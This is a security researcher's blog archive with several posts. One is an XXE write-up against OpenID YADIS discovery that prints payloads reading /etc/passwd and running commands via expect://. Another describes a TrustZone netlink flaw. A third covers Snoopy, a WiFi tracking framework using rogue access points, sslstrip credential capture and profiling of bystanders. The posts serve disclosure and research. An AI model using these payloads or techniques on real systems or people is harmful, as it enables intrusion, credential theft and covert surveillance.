Grey bar Blue bar
Share this:

Tue, 28 Jan 2014

Revisting XXE and abusing protocols

Recently a security researcher reported a bug in Facebook that could potentially allow Remote Code Execution (RCE). His writeup of the incident is available here if you are interested. The thing that caught my attention about his writeup was not the fact that he had pwned Facebook or earned $33,500 doing it, but the fact that he used OpenID to accomplish this. After having a quick look at the output from the PoC and rereading the vulnerability description I had a pretty good idea of how the vulnerability was triggered and decided to see if any other platforms were vulnerable.

The basic premise behind the vulnerability is that when a user authenticates with a site using OpenID, that site does a 'discovery' of the user's identity. To accomplish this the server contacts the identity server specified by the user, downloads information regarding the identity endpoint and proceeds with authentication. There are two ways that a site may do this discovery process, either through HTML or a YADIS discovery. Now this is where it gets interesting, HTML look-up is simply a HTML document with some meta information contained in the head tags:

1
2
3
4
<head>
<link rel="openid.server" href="http://www.example.com/myendpoint/" />
<link rel="openid2.provider" href="http://www.example.com/myendpoint/" />
</head>
Whereas the Yadis discovery relies on a XRDS document:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
<xrds:XRDS
  xmlns:xrds="xri://$xrds"
  xmlns:openid="http://openid.net/xmlns/1.0"
  xmlns="xri://$xrd*($v*2.0)">
  <XRD>
    <Service priority="0">
      <Type>http://openid.net/signon/1.0</Type>
      <URI>http://198.x.x.143:7804:/raw</URI>
      <openid:Delegate>http://198.x.x.143:7804/delegate</openid:Delegate>
    </Service>
  </XRD>
</xrds:XRDS>
Now if you have been paying attention the potential for exploitation should be jumping out at you. XRDS is simply XML and as you may know, when XML is used there is a good chance that an application may be vulnerable to exploitation via XML External Entity (XXE) processing. XXE is explained by OWASP and I'm not going to delve into it here, but the basic premise behind it is that you can specify entities in the XML DTD that when processed by an XML parser get interpreted and 'executed'.

From the description given by Reginaldo the vulnerability would be triggered by having the victim (Facebook) perform the YADIS discovery to a host we control. Our host would serve a tainted XRDS and our XXE would be triggered when the document was parsed by our victim. I whipped together a little PoC XRDS document that would cause the target host to request a second file (198.x.x.143:7806/success.txt) from a server under my control. I ensured that the tainted XRDS was well formed XML and would not cause the parser to fail (a quick check can be done by using http://www.xmlvalidation.com/index.php)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?xml version="1.0" standalone="no"?>
<!DOCTYPE xrds:XRDS [
  <!ELEMENT xrds:XRDS (XRD)>
  <!ATTLIST xrds:XRDS xmlns:xrds CDATA "xri://$xrds">
  <!ATTLIST xrds:XRDS xmlns:openid CDATA "http://openid.net/xmlns/1.0">
  <!ATTLIST xrds:XRDS xmlns CDATA "xri://$xrd*($v*2.0)">
  <!ELEMENT XRD (Service)*>
  <!ELEMENT Service (Type,URI,openid:Delegate)>
  <!ATTLIST Service priority CDATA "0">
  <!ELEMENT Type (#PCDATA)>
  <!ELEMENT URI (#PCDATA)>
  <!ELEMENT openid:Delegate (#PCDATA)>
  <!ENTITY a SYSTEM 'http://198.x.x.143:7806/success.txt'>
]>

<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns:openid="http://openid.net/xmlns/1.0" xmlns="xri://$xrd*($v*2.0)"> <XRD> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>http://198.x.x.143:7806/raw.xml</URI> <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>&a;</URI> <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service> </XRD> </xrds:XRDS>

In our example the fist <Service> element would parse correctly as a valid OpenID discovery, while the second <Service> element contains our XXE in the form of <URI>&a;</URI>. To test this we set spun up a standard LAMP instance on DigitalOcean and followed the official installation instructions for a popular, OpenSource, Social platform that allowed for OpenID authentication. And then we tried out our PoC.

"Testing for successful XXE"

It worked! The initial YADIS discovery (orange) was done by our victim (107.x.x.117) and we served up our tainted XRDS document. This resulted in our victim requesting the success.txt file (red). So now we know we have some XXE going on. Next we needed to turn this into something a little more useful and emulate Reginaldo's Facebook success. A small modification was made to our XXE payload by changing the Entity description for our 'a' entity as follows: <!ENTITY a SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>. This will cause the PHP filter function to be applied to our input stream (the file read) before the text was rendered. This served two purposes, firstly to ensure the file we were reading to introduce any XML parsing errors and secondly to make the output a little more user friendly.

The first run with this modified payload didn't yield the expected results and simply resulted in the OpenID discovery being completed and my browser trying to download the identity file. A quick look at the URL, I realised that OpenID expected the identity server to automatically instruct the user's browser to return to the site which initiated the OpenID discovery. As I'd just created a simple python web server with no intelligence, this wasn't happening. Fortunately this behaviour could be emulated by hitting 'back' in the browser and then initiating the OpenID discovery again. Instead of attempting a new discovery, the victim host would use the cached identity response (with our tainted XRDS) and the result was returned in the URL.

"The simple python webserver didn't obey the redirect instruction in the URL and the browser would be stuck at the downloaded identity file."

"Hitting the back button and requesting OpenID login again would result in our XXE data being displayed in the URL."

Finally all we needed to do was base64 decode the result from the URL and we would have the contents of /etc/passwd.

"The decoded base64 string yielded the contents of /etc/passwd"

This left us with the ability to read *any* file on the filesystem, granted we knew the path and that the web server user had permissions to access that file. In the case of this particular platform, an interesting file to read would be config.php which yields the admin username+password as well as the mysql database credentials. The final trick was to try and turn this into RCE as was hinted in the Facebook disclosure. As the platform was written in PHP we could use the expect:// handler to execute code. <!ENTITY a SYSTEM 'expect://id'>, which should execute the system command 'id'. One dependency here is that the expect module is installed and loaded (http://de2.php.net/manual/en/expect.installation.php). Not too sure how often this is the case but other attempts at RCE haven't been too successful. Armed with our new XRDS document we reenact our steps from above and we end up with some code execution.

"RCE - retrieving the current user id"

And Boom goes the dynamite.

All in all a really fun vulnerability to play with and a good reminder that data validation errors don't just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates from. To protect against this form of attack in PHP the following should be set when using the default XML parser:

libxml_disable_entity_loader(true);

A good document with PHP security tips can be found here: http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html

./et

Mon, 20 Jan 2014

January Get Fit Reversing Challenge

Aah, January, a month where resolutions usually flare out spectacularly before we get back to the couch in February. We'd like to help you along your way with a reverse engineering challenge put together by Siavosh as an introduction to reversing, and a bit of fun.

The Setup


This simple reversing challenge should take 4-10+ hours to complete, depending on your previous experience. The goal was to create an interactive challenge that takes you through different areas of the reverse engineering process, such as file format reverse engineering, behavioural and disassembly analysis.


Once you reached the final levels, you might need to spend some time understanding x86 assembly or spend some time refreshing it depending on your level. To help out, Siavosh created a crash course tutorial in x86 assembly for our malware workshop at 44con last year, and you can download that over here.


The zip file containing the reversing challenge and additional bytecode binaries could be found here.


Send your solution(s) to challenge at sensepost.com

The Scenario


You've been called into ACME Banks global headquarters to investigate a breach. It appears Evilgroup has managed to breach a server and deploy their own executable on it (EvilGroupVM.exe). The executable is software that accepts bytecode files and executes them, similar to how the Java Virtual Machine functions. Using this technique, Evilgroup hopes they can evade detection by antivirus software. Their OPSEC failure meant that both the virtual machine executable and several bytecode files were left behind after the cleanup script ran and it's your job to work out the instruction set of EvilGroupVM.exe.


Disclaimer: When using the term "virtual machine" we mean something like the Java Virtual Machine. A software based architecture that you can write programs for. This particular architecture, EvilGroupVM.exe, has nine instructions whose operation code (opcode) you need to find through binary reverse engineering.


The tools you will require are:


  • A hex editor (any will do)

  • A disassembler like IDA (the free version for Windows will work if you don't have a registered copy)

  • A debugger, Olly or WinDBG on Windows, Gnu GDB or EDB on Linux https://www.gnu.org/software/gdb/


Basic Usage: Unzip the reverseme folder, open a command line and cd to it. Depending on operating system, type
Windows: EvilGroupVM.exe <BytecodeFile>
Ubuntu Linux: ./EvilGroupVM <BytecodeFile>

For example, to run the helloworld bytecode file on Windows, you would type:
EvilGroupVM.exe helloworld

IMPORTANT: Note that the EvilGroupVM.exe architecture has debugging capabilities enabled. This means, it has one instruction that shows you the thread context of a binary when it is hit. Once you start developing your own bytecode binaries, it is possible to debug them (but you need to find the debug instruction/opcode first).


The outcome of this exercise should include the following key structures in your report:


  1. A description of the binary file format. For example:

    • What does the bytecode file header look like?

    • What determines where execution will start once the bytecode is loaded in the VM?

    • Does the architecture contain other parts of memory (like a stack) where it can store data and operate on them?


  2. The instruction set including their impact on the runtime memory. You should:


    • Find all instructions that the EvilGroupVM.exe accepts

    • Analyse each of them and understand how they make changes to the runtime memory of the bytecodes thread


  3. Write a proof of concept self modifying bytecode file that prints your name to the screen. The binary must be self modifying, that is, you may not use the "print_char" instruction directly, rather, the binary must modify itself if it wants to make use of "print_char".

  4. For the advanced challenge, if you have the ability and time, send us back a C file that, when compiled, will give an almost exact match compared to EvilGroupVM (Ubuntu Linux) or EvilGroupVM.exe (Windows). Focus on getting pointer arithmetic and data structures correct.


In case you missed it earlier, the zip file containing the reversing challenge and additional bytecode binaries could be found here.


Send your solution(s) to challenge at sensepost.com


Good luck!

Thu, 6 Jun 2013

A software level analysis of TrustZone OS and Trustlets in Samsung Galaxy Phone

Introduction:


New types of mobile applications based on Trusted Execution Environments (TEE) and most notably ARM TrustZone micro-kernels are emerging which require new types of security assessment tools and techniques. In this blog post we review an example TrustZone application on a Galaxy S3 phone and demonstrate how to capture communication between the Android application and TrustZone OS using an instrumented version of the Mobicore Android library. We also present a security issue in the Mobicore kernel driver that could allow unauthorised communication between low privileged Android processes and Mobicore enabled kernel drivers such as an IPSEC driver.


Mobicore OS :


The Samsung Galaxy S III was the first mobile phone that utilized ARM TrustZone feature to host and run a secure micro-kernel on the application processor. This kernel named Mobicore is isolated from the handset's Android operating system in the CPU design level. Mobicore is a micro-kernel developed by Giesecke & Devrient GmbH (G&D) which uses TrustZone security extension of ARM processors to create a secure program execution and data storage environment which sits next to the rich operating system (Android, Windows , iOS) of the Mobile phone or tablet. The following figure published by G&D demonstrates Mobicore's architecture :

Overview of Mobicore (courtesy of G&D)


A TrustZone enabled processor provides "Hardware level Isolation" of the above "Normal World" (NWd) and "Secure World" (SWd) , meaning that the "Secure World" OS (Mobicore) and programs running on top of it are immune against software attacks from the "Normal World" as well as wide range of hardware attacks on the chip. This forms a "trusted execution environment" (TEE) for security critical application such as digital wallets, electronic IDs, Digital Rights Management and etc. The non-critical part of those applications such as the user interface can run in the "Normal World" operating system while the critical code, private encryption keys and sensitive I/O operations such as "PIN code entry by user" are handled by the "Secure World". By doing so, the application and its sensitive data would be protected against unauthorized access even if the "Normal World" operating system was fully compromised by the attacker, as he wouldn't be able to gain access to the critical part of the application which is running in the secure world.

Mobicore API:


The security critical applications that run inside Mobicore OS are referred to as trustlets and are developed by third-parties such as banks and content providers. The trustlet software development kit includes library files to develop, test and deploy trustlets as well as Android applications that communicate with relevant trustlets via Mobicore API for Android. Trustlets need to be encrypted, digitally signed and then remotely provisioned by G&D on the target mobile phone(s). Mobicore API for Android consists of the following 3 components:


1) Mobicore client library located at /system/lib/libMcClient.so: This is the library file used by Android OS or Dalvik applications to establish communication sessions with trustlets on the secure world


2) Mobicore Daemon located at /system/bin/mcDriverDaemon: This service proxies Mobicore commands and responses between NWd and SWd via Mobicore device driver


3) Mobicore device driver: Registers /dev/mobicore device and performs ARM Secure Monitor Calls (SMC) to switch the context from NWd to SWd


The source code for the above components can be downloaded from Google Code. I enabled the verbose debug messages in the kernel driver and recompiled a Samsung S3 kernel image for the purpose of this analysis. Please note that you need to download the relevant kernel source tree and stock ROM for your S3 phone kernel build number which can be found in "Settings->About device". After compiling the new zImage file, you would need to insert it into a custom ROM and flash your phone. To build the custom ROM I used "Android ROM Kitchen 0.217" which has the option to unpack zImage from the stock ROM, replace it with the newly compiled zImage and pack it again.


By studying the source code of the user API library and observing debug messages from the kernel driver, I figured out the following data flow between the android OS and Mobicore to establish a session and communicate with a trustlet:


1) Android application calls mcOpenDevice() API which cause the Mobicore Daemon (/system/bin/mcDriverDaemon) to open a handle to /dev/mobicore misc device.


2) It then allocates a "Worlds share memory" (WSM) buffer by calling mcMallocWsm() that cause the Mobicore kernel driver to allocate wsm buffer with the requested size and map it to the user space application process. This shared memory buffer would later be used by the android application and trustlet to exchange commands and responses.


3) The mcOpenSession() is called with the UUID of the target trustlet (10 bytes value, for instance : ffffffff000000000003 for PlayReady DRM truslet) and allocate wsm address to establish a session with the target trustlet through the allocated shared memory.


4) Android applications have the option to attach additional memory buffers (up to 6 with maximum size of 1MB each) to the established session by calling mcMap() API. In case of PlayReady DRM trustlet which is used by the Samsung VideoHub application, two additional buffers are attached: one for sending and receiving the parameters and the other for receiving trustlet's text output.


5) The application copies the command and parameter types to the WSM along with the parameter values in second allocated buffer and then calls mcNotify() API to notify the Mobicore that a pending command is waiting in the WSM to be dispatched to the target trustlet.


6) The mcWaitNotification() API is called with the timeout value which blocks until a response received from the trustlet. If the response was not an error, the application can read trustlets' returned data, output text and parameter values from WSM and the two additional mapped buffers.


7) At the end of the session the application calls mcUnMap, mcFreeWsm and mcCloseSession .


The Mobicore kernel driver is the only component in the android operating system that interacts directly with Mobicore OS by use of ARM CPU's SMC instruction and Secure Interrupts . The interrupt number registered by Mobicore kernel driver in Samsung S3 phone is 47 that could be different for other phone or tablet boards. The Mobicore OS uses the same interrupt to notify the kernel driver in android OS when it writes back data.


Analysis of a Mobicore session:


There are currently 5 trustlets pre-loaded on the European S3 phones as listed below:


shell@android:/ # ls /data/app/mcRegistry


00060308060501020000000000000000.tlbin
02010000080300030000000000000000.tlbin
07010000000000000000000000000000.tlbin
ffffffff000000000000000000000003.tlbin
ffffffff000000000000000000000004.tlbin
ffffffff000000000000000000000005.tlbin


The 07010000000000000000000000000000.tlbin is the "Content Management" trustlet which is used by G&D to install/update other trustlets on the target phones. The 00060308060501020000000000000000.tlbin and ffffffff000000000000000000000003.tlbin are DRM related truslets developed by Discretix. I chose to analyze PlayReady DRM trustlet (ffffffff000000000000000000000003.tlbin), as it was used by the Samsung videohub application which is pre-loaded on the European S3 phones.


The videohub application dose not directly communicate with PlayReady trustlet. Instead, the Android DRM manager loads several DRM plugins including libdxdrmframeworkplugin.so which is dependent on libDxDrmServer.so library that makes Mobicore API calls. Both of these libraries are closed source and I had to perform dynamic analysis to monitor communication between libDxDrmServer.so and PlayReady trustlet. For this purpose, I could install API hooks in android DRM manager process (drmserver) and record the parameter values passed to Mobicore user library (/system/lib/libMcClient.so) by setting LD_PRELOAD environment variable in the init.rc script and flash my phone with the new ROM. I found this approach unnecessary, as the source code for Mobicore user library was available and I could add simple instrumentation code to it which saves API calls and related world shared memory buffers to a log file. In order to compile such modified Mobicore library, you would need to the place it under the Android source code tree on a 64 bit machine (Android 4.1.1 requires 64 bit machine to compile) with 30 GB disk space. To save you from this trouble, you can download a copy of my Mobicore user library from here. You need to create the empty log file at /data/local/tmp/log and replace this instrumented library with the original file (DO NOT FORGET TO BACKUP THE ORIGINAL FILE). If you reboot the phone, the Mobicore session between Android's DRM server and PlayReady trustlet will be logged into /data/local/tmp/log. A sample of such session log is shown below:



The content and address of the shared world memory and two additional mapped buffers are recorded in the above file. The command/response format in wsm buffer is very similar to APDU communication in smart card applications and this is not a surprise, as G&D has a long history in smart card technology. The next step is to interpret the command/response data, so that we can manipulate them later and observe the trustlet behavior. The trustlet's output in text format together with inspecting the assembly code of libDxDrmServer.so helped me to figure out the PlayReady trustlet command and response format as follows:


client command (wsm) : 08022000b420030000000001000000002500000028023000300000000500000000000000000000000000b0720000000000000000


client parameters (mapped buffer 1): 8f248d7e3f97ee551b9d3b0504ae535e45e99593efecd6175e15f7bdfd3f5012e603d6459066cc5c602cf3c9bf0f705b


trustlet response (wsm):08022000b420030000000081000000002500000028023000300000000500000000000000000000000000b0720000000000000000


trustltlet text output (mapped buffer 2):


==================================================


SRVXInvokeCommand command 1000000 hSession=320b4


SRVXInvokeCommand. command = 0x1000000 nParamTypes=0x25


SERVICE_DRM_BBX_SetKeyToOemContext - pPrdyServiceGlobalContext is 32074


SERVICE_DRM_BBX_SetKeyToOemContext cbKey=48


SERVICE_DRM_BBX_SetKeyToOemContext type=5


SERVICE_DRM_BBX_SetKeyToOemContext iExpectedSize match real size=48


SERVICE_DRM_BBX_SetKeyToOemContext preparing local buffer DxDecryptAsset start - iDatatLen=32, pszInData=0x4ddf4 pszIntegrity=0x4dde4


DxDecryptAsset calling Oem_Aes_SetKey DxDecryptAsset


calling DRM_Aes_CtrProcessData DxDecryptAsset


calling DRM_HMAC_CreateMAC iDatatLen=32 DxDecryptAsset


after calling DRM_HMAC_CreateMAC DxDecryptAsset


END SERVICE_DRM_BBX_SetKeyToOemContext


calling DRM_BBX_SetKeyToOemContext


SRVXInvokeCommand.id=0x1000000 res=0x0


==============================================


By mapping the information disclosed in the trustlet text output to the client command the following format was derived:


08022000 : virtual memory address of the text output buffer in the secure world (little endian format of 0x200208)


b4200300 : PlayReady session ID


00000001: Command ID (0x1000000)


00000000: Error code (0x0 = no error, is set by truslet after mcWaitNotification)


25000000: Parameter type (0x25)


28023000: virtual memory address of the parameters buffer in the secure world (little endian format of 0x300228)


30000000: Parameters length in bytes (0x30, encrypted key length)


05000000: encryption key type (0x5)


The trustlet receives client supplied memory addresses as input data which could be manipulated by an attacker. We'll test this attack later. The captured PlayReady session involved 18 command/response pairs that correspond to the following high level diagram of PlayReady DRM algorithm published by G&D. I couldn't find more detailed specification of the PlayReady DRM on the MSDN or other web sites. But at this stage, I was not interested in the implementation details of the PlayReady schema, as I didn't want to attack the DRM itself, but wanted to find any exploitable issue such as a buffer overflow or memory disclosure in the trustlet.

DRM Trustlet diagram (courtesy of G&D)


Security Tests:


I started by auditing the Mobicore daemon and kernel driver source code in order to find issues that can be exploited by an android application to attack other applications or result in code execution in the Android kernel space. I find one issue in the Mobicore kernel API which is designed to provide Mobicore services to other Android kernel components such as an IPSEC driver. The Mobicore driver registers Linux netLink server with id=17 which was intended to be called from the kernel space, however a Linux user space process can create a spoofed message using NETLINK sockets and send it to the Mobicore kernel driver netlink listener which as shown in the following figure did not check the PID of the calling process and as a result, any Android app could call Mobicore APIs with spoofed session IDs. The vulnerable code snippet from MobiCoreKernelApi/main.c is included below.



An attacker would need to know the "sequence number" of an already established netlink connection between a kernel component such as IPSEC and Mobicore driver in order to exploit this vulnerability. This sequence numbers were incremental starting from zero but currently there is no kernel component on the Samsung phone that uses the Mobicore API, thus this issue was not a high risk. We notified the vendor about this issue 6 months ago but haven't received any response regarding the planned fix. The following figures demonstrate exploitation of this issue from an Android unprivileged process :

Netlink message (seq=1) sent to Mobicore kernel driver from a low privileged process


Unauthorised netlink message being processed by the Mobicore kernel driver


In the next phase of my tests, I focused on fuzzing the PlayReady DRM trustlet that mentioned in the previous section by writing simple C programs which were linked with libMcClient.so and manipulating the DWORD values such as shared buffer virtual address. The following table summarises the results:
wsm offsetDescriptionResults
0Memory address of the mapped output buffer in trustlet process (original value=0x08022000)for values<0x8022000 the fuzzer crashed


values >0x8022000 no errors

41memory address of the parameter mapped buffer in trusltet process (original value=0x28023000)0x00001000<value<0x28023000 the fuzzer crashed


value>=00001000 trustlet exits with "parameter refers to secure memory area"


value>0x28023000 no errors

49Parameter length (encryption key or certificate file length)For large numbers the trustlet exits with "malloc() failed" message

The fuzzer crash indicated that Mobicore micro-kernel writes memory addresses in the normal world beyond the shared memory buffer which was not a critical security issue, because it means that fuzzer can only attack itself and not other processes. The "parameter refers to secure memory area" message suggests that there is some sort of input validation implemented in the Mobicore OS or DRM trustlet that prevents normal world's access to mapped addresses other than shared buffers. I haven't yet run fuzzing on the parameter values itself such as manipulating PlayReady XML data elements sent from the client to the trustlet. However, there might be vulnerabilities in the PlayReady implementation that can be picked up by smarter fuzzing.


Conclusion:


We demonstrated that intercepting and manipulating the worlds share memory (WSM) data can be used to gain better knowledge about the internal workings of Mobicore trustlets. We believe that this method can be combined with the side channel measurements to perform blackbox security assessment of the mobile TEE applications. The context switching and memory sharing between normal and secure world could be subjected to side channel attacks in specific cases and we are focusing our future research on this area.

Thu, 23 May 2013

Stay low, move fast, shoot first, die last, one shot, one kill, no luck, pure skill ...


We're excited to be presenting our Hacking By Numbers Combat course again at Black Hat USA this year. SensePost's resident German haxor dude Georg-Christian Pranschke will be presenting this year's course. Combat fits in right at the top of our course offerings. No messing about, this really is the course where your sole aim is to pwn as much of the infrastructure and applications as possible. It is for the security professional looking to hone their skill-set, or to think like those in Unit 61398. There are a few assumptions though:


  • you have an excellent grounding in terms of infrastructure - and application assessments

  • you aren't scared of tackling systems that aren't easily owned using Metasploit

  • gaining root is an almost OCD-like obsession

  • there are no basic introductions into linux, shells, pivoting etc.


As we've always said, it is quite literally an all-hack, no-talk course. We are not going to dictate what tools or technologies get used by students. We don't care if you use ruby or perl or python to break something (we do, actually - we don't like ruby), just as long as it gets broken. The Combat course itself is a series of between 12 and 15 (depending on time) capture the flag type exercises presented over a period of two days. The exercises include infrastructure, reverse engineering and crypto.


These targets come from real life assessments we've faced at SensePost, it's about as real as you can get without having to do the report at the end of it. How it works is that candidates are presented with a specific goal. If the presenter is feeling generous at the time, they may even get a description of the technology. After that, they'll have time to solve the puzzle. Afterwards, there will be a discussion about the failings, takeaways and alternate approaches adopted by the class. The latter is normally fascinating as (as anybody in the industry knows), there are virtually a limitless number of different ways to solve specific problems. This means that even the instructor gets to learn a couple of new tricks (we also have prizes for those who teach them enough new tricks).


In 2012, Combat underwent a massive rework and we presented a virtually new course which went down excellently. We're aiming to do the same this year, and to make it the best Combat course ever. So if you're interested in spending two days' worth of intense thinking solving some fairly unique puzzles and shelling boxen, join us for HBN Combat at BlackHat USA.

Tue, 25 Sep 2012

Snoopy: A distributed tracking and profiling framework

At this year's 44Con conference (held in London) Daniel and I introduced a project we had been working on for the past few months. Snoopy, a distributed tracking and profiling framework, allowed us to perform some pretty interesting tracking and profiling of mobile users through the use of WiFi. The talk was well received (going on what people said afterwards) by those attending the conference and it was great to see so many others as excited about this as we have been.

In addition to the research, we both took a different approach to the presentation itself. A 'no bullet points' approach was decided upon, so the slides themselves won't be that revealing. Using Steve Jobs as our inspiration, we wanted to bring back the fun to technical conferences, and our presentation hopefully represented that. As I type this, I have been reliably informed that the DVD, and subsequent videos of the talk, is being mastered and will be ready shortly. Once we have it, we will update this blog post. In the meantime, below is a description of the project.

Background

There have been recent initiatives from numerous governments to legalise the monitoring of citizens' Internet based communications (web sites visited, emails, social media) under the guise of anti-terrorism. Several private organisations have developed technologies claiming to facilitate the analysis of collected data with the goal of identifying undesirable activities. Whether such technologies are used to identify such activities, or rather to profile all citizens, is open to debate. Budgets, technical resources, and PhD level staff are plentiful in this sphere.

Snoopy

The above inspired the goal of the Snoopy project: with the limited time and resources of a few technical minds could we create our own distributed tracking and data interception framework with functionality for simple analysis of collected data? Rather than terrorist-hunting, we would perform simple tracking and real-time + historical profiling of devices and the people who own them. It is perhaps worth mentioning at this point that Snoopy is compromised of various existing technologies combined into one distributed framework.

"Snoopy is a distributed tracking and profiling framework."

Below is a diagram of the Snoopy architecture, which I'll elaborate on:

1. Distributed?

Snoopy runs client side code on any Linux device that has support for wireless monitor mode / packet injection. We call these "drones" due to their optimal nature of being small, inconspicuous, and disposable. Examples of drones we used include the Nokia N900, Alfa R36 router, Sheeva plug, and the RaspberryPi. Numerous drones can be deployed over an area (say 50 all over London) and each device will upload its data to a central server.

2. WiFi?

A large number of people leave their WiFi on. Even security savvy folk; for example at BlackHat I observed >5,000 devices with their WiFi on. As per the RFC documentation (i.e. not down to individual vendors) client devices send out 'probe requests' looking for networks that the devices have previously connected to (and the user chose to save). The reason for this appears to be two fold; (i) to find hidden APs (not broadcasting beacons) and (ii) to aid quick transition when moving between APs with the same name (e.g. if you have 50 APs in your organisation with the same name). Fire up a terminal and bang out this command to see these probe requests:

tshark -n -i mon0 subtype probereq

(where mon0 is your wireless device, in monitor mode)

2. Tracking?

Each Snoopy drone collects every observed probe-request, and uploads it to a central server (timestamp, client MAC, SSID, GPS coordinates, and signal strength). On the server side client observations are grouped into 'proximity sessions' - i.e device 00:11:22:33:44:55 was sending probes from 11:15 until 11:45, and therefore we can infer was within proximity to that particular drone during that time.

We now know that this device (and therefore its human) were at a certain location at a certain time. Given enough monitoring stations running over enough time, we can track devices/humans based on this information.

3. Passive Profiling?

We can profile device owners via the network SSIDs in the captured probe requests. This can be done in two ways; simple analysis, and geo-locating.

Simple analysis could be along the lines of "Hmm, you've previously connected to hooters, mcdonalds_wifi, and elCheapoAirlines_wifi - you must be an average Joe" vs "Hmm, you've previously connected to "BA_firstclass, ExpensiveResataurant_wifi, etc - you must be a high roller".

Of more interest, we can potentially geo-locate network SSIDs to GPS coordinates via services like Wigle (whose database is populated via wardriving), and then from GPS coordinates to street address and street view photographs via Google. What's interesting here is that as security folk we've been telling users for years that picking unique SSIDs when using WPA[2] is a "good thing" because the SSID is used as a salt. A side-effect of this is that geo-locating your unique networks becomes much easier. Also, we can typically instantly tell where you work and where you live based on the network name (e.g BTBusinessHub-AB12 vs BTHomeHub-FG12).

The result - you walk past a drone, and I get a street view photograph of where you live, work and play.

4. Rogue Access Points, Data Interception, MITM attacks?

Snoopy drones have the ability to bring up rogue access points. That is to say, if your device is probing for "Starbucks", we'll pretend to be Starbucks, and your device will connect. This is not new, and dates back to Karma in 2005. The attack may have been ahead of its time, due to the far fewer number of wireless devices. Given that every man and his dog now has a WiFi enabled smartphone the attack is much more relevant.

Snoopy differentiates itself with its rogue access points in the way data is routed. Your typical Pineapple, Silica, or various other products store all intercepted data locally, and mangles data locally too. Snoopy drones route all traffic via an OpenVPN connection to a central server. This has several implications:

(i) We can observe traffic from *all* drones in the field at one point on the server. (ii) Any traffic manipulation needs only be done on the server, and not once per drone. (iii) Since each Drone hands out its own DHCP range, when observing network traffic on the server we see the source IP address of the connected clients (resulting in a unique mapping of MAC <-> IP <-> network traffic). (iv) Due to the nature of the connection, the server can directly access the client devices. We could therefore run nmap, Metasploit, etc directly from the server, targeting the client devices. This is a much more desirable approach as compared to running such 'heavy' software on the Drone (like the Pineapple, pr Pwnphone/plug would). (v) Due to the Drone not storing data or malicious tools locally, there is little harm if the device is stolen, or captured by an adversary.

On the Snoopy server, the following is deployed with respect to web traffic:

(i) Transparent Squid server - logs IP, websites, domains, and cookies to a database (ii) sslstrip - transparently hijacks HTTP traffic and prevent HTTPS upgrade by watching for HTTPS links and redirecting. It then maps those links into either look-alike HTTP links or homograph-similar HTTPS links. All credentials are logged to the database (thanks Ian & Junaid). (iii) mitmproxy.py - allows for arbitary code injection, as well as the use of self-signed SSL certificates. By default we inject some JavaScipt which profiles the browser to discern the browser version, what plugins are installed, etc (thanks Willem).

Additionally, a traffic analysis component extracts and reassembles files. e.g. PDFs, VOiP calls, etc. (thanks Ian).

5. Higher Level Profiling? Given that we can intercept network traffic (and have clients' cookies/credentials/browsing habbits/etc) we can extract useful information via social media APIs. For example, we could retrieve all Facebook friends, or Twitter followers.

6. Data Visualization and Exploration? Snoopy has two interfaces on the server; a web interface (thanks Walter), and Maltego transforms.

-The Web Interface The web interface allows basic data exploration, as well as mapping. The mapping part is the most interesting - it displays the position of Snoopy Drones (and client devices within proximity) over time. This is depicted below:

-Maltego Maltego Radium has recently been released; and it is one awesome piece of kit for data exploration and visualisation.What's great about the Radium release is that you can combine multiple transforms together into 'machines'. A few example transformations were created, to demonstrate:

1. Devices Observed at both 44Con and BlackHat Vegas Here we depict devices that were observed at both 44Con and BlackHat Las Vegas, as well as the SSIDs they probed for.

2. Devices at 44Con, pruned Here we look at all devices and the SSIDs they probed for at 44Con. The pruning consisted of removing all SSIDs that only one client was looking for, or those for which more than 20 were probing for. This could reveal 'relationship' SSIDs. For example, if several people from the same company were attending- they could all be looking for their work SSID. In this case, we noticed the '44Con crew' network being quite popular. To further illustrate Snoopy we 'targeted' these poor chaps- figuring out where they live, as well as their Facebook friends (pulled from intercepted network traffic*).

Snoopy Field Experiment

We collected broadcast probe requests to create two main datasets. I collected data at BlackHat Vegas, and four of us sat in various London underground stations with Snoopy drones running for 2 hours. Furthermore, I sat at King's Cross station for 13 hours (!?) collecting data. Of course it may have made more sense to just deploy an unattended Sheeva plug, or hide a device with a large battery pack - but that could've resulted in trouble with the law (if spotted on CCTV). I present several graphs depicting the outcome from these trials:

The pi chart below depicts the proportion of observed devices per vendor, from the total sample of 77,498 devices. It is interesting to see Apple's dominance. pi_chart

The barchart below depicts the average number of broadcast SSIDs from a random sample of 100 devices per vendor (standard deviation bards need to be added - it was quite a spread).

The barchart below depicts my day sitting at King's Cross station. The horizontal axis depicts chunks of time per hour, and the vertical access number of unique device observations. We clearly see the rush hours.

Potential Use

What could be done with Snoopy? There are likely legal, borderline, and illegal activities. Such is the case with any technology.

Legal -Collecting anonymized statistics on thoroughfare. For example, Transport for London could deploy these devices at every London underground to get statistics on peak human traffic. This would allow them to deploy more staff, or open more pathways, etc. Such data over the period of months and years would likely be of use for future planning. -Penetration testers targeting clients to demonstrate the WiFi threat.

Borderline -This type of technology could likely appeal to advertisers. For example, a reseller of a certain brand of jeans may note that persons who prefer certain technologies (e.g. Apple) frequent certain locations. -Companies could deploy Drones in one of each of their establishments (supermarkets, nightclubs, etc) to monitor user preference. E.g. a observing a migration of customers from one establishment to another after the deployment of certain incentives (e.g. promotions, new layout). -Imagine the Government deploying hundreds of Drones all over a city, and then having field agents with mobile Drones in their pockets. This could be a novel way to track down or follow criminals. The other side of the coin of course being that they track all of us...

